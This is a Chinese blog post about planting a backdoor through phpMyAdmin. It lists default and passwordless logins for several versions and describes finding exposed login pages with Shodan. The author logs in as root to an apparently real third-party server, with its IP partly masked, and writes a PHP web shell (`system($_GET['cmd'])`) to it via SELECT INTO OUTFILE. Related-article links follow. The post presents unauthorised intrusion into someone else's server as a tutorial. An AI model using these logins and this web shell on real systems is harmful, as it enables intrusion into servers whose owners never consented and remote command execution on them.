phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
substr()函数中文版
Oct 09 PHP
PHP提示Notice: Undefined variable的解决办法
Nov 24 PHP
php小经验:解析preg_match与preg_match_all 函数
Jun 29 PHP
laravel容器延迟加载以及auth扩展详解
Mar 02 PHP
PHP中的traits实现代码复用使用实例
May 13 PHP
PHP微信支付实例解析
Jul 22 PHP
详谈php中 strtr 和 str_replace 的效率问题
May 14 PHP
php二维码生成以及下载实现
Sep 28 PHP
PHP 实现人民币小写转换成大写的方法及大小写转换函数
Nov 17 PHP
Laravel如何使用Redis共享Session
Feb 23 PHP
PHP parse_ini_file函数的应用与扩展操作示例
Jan 07 PHP
PHP单元测试配置与使用方法详解
Dec 27 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
php 无法加载mysql的module的时候的配置的解决方案引发的思考
2012/01/27 PHP
php实现支持中文的文件下载功能示例
2017/08/30 PHP
php array 转json及java 转换 json数据格式操作示例
2019/11/13 PHP
让firefox支持IE的一些方法的javascript扩展函数代码
2010/01/02 Javascript
jQuery Ajax请求状态管理器打包
2012/05/03 Javascript
javascript删除option选项的多种方法总结
2013/11/22 Javascript
JavaScript原生对象之Date对象的属性和方法详解
2015/03/13 Javascript
将List对象列表转换成JSON格式的类实现方法
2016/07/04 Javascript
浅谈js在html中的加载执行顺序,多个jquery ready执行顺序
2016/11/26 Javascript
实例解析ES6 Proxy使用场景介绍
2018/01/08 Javascript
vue数据操作之点击事件实现num加减功能示例
2019/01/19 Javascript
Node.js + express基本用法教程
2019/03/14 Javascript
vue组件数据传递、父子组件数据获取,slot,router路由功能示例
2019/03/19 Javascript
Vue.js页面中有多个input搜索框如何实现防抖操作
2019/11/04 Javascript
vue中实现点击按钮滚动到页面对应位置的方法(使用c3平滑属性实现)
2019/12/29 Javascript
Vue3配置axios跨域实现过程解析
2020/11/25 Vue.js
Python操作json数据的一个简单例子
2014/04/17 Python
python的tkinter布局之简单的聊天窗口实现方法
2014/09/03 Python
python实现图片变亮或者变暗的方法
2015/06/01 Python
python发送邮件实例分享
2017/07/28 Python
Django 表单模型选择框如何使用分组
2019/05/16 Python
解决pycharm最左侧Tool Buttons显示不全的问题
2019/12/17 Python
numpy实现神经网络反向传播算法的步骤
2019/12/24 Python
python线程join方法原理解析
2020/02/11 Python
python向xls写入数据(包括合并,边框,对齐,列宽)
2021/02/02 Python
突袭HTML5之Javascript API扩展3—本地存储全新体验
2013/01/31 HTML / CSS
html5教程制作简单画板代码分享
2013/12/04 HTML / CSS
印度尼西亚最大和最全面的网络商城:Blibli.com
2017/10/04 全球购物
从当地商店送来的杂货:Instacart
2018/08/19 全球购物
人力资源部经理助理岗位职责
2014/03/04 职场文书
毕业生欢送会主持词
2014/03/31 职场文书
高考标语大全
2014/06/05 职场文书
幼儿园植树节活动总结
2014/07/04 职场文书
学生喝酒检讨书500字
2014/11/02 职场文书
生死牛玉儒观后感
2015/06/11 职场文书
安全生产隐患排查制度
2015/08/05 职场文书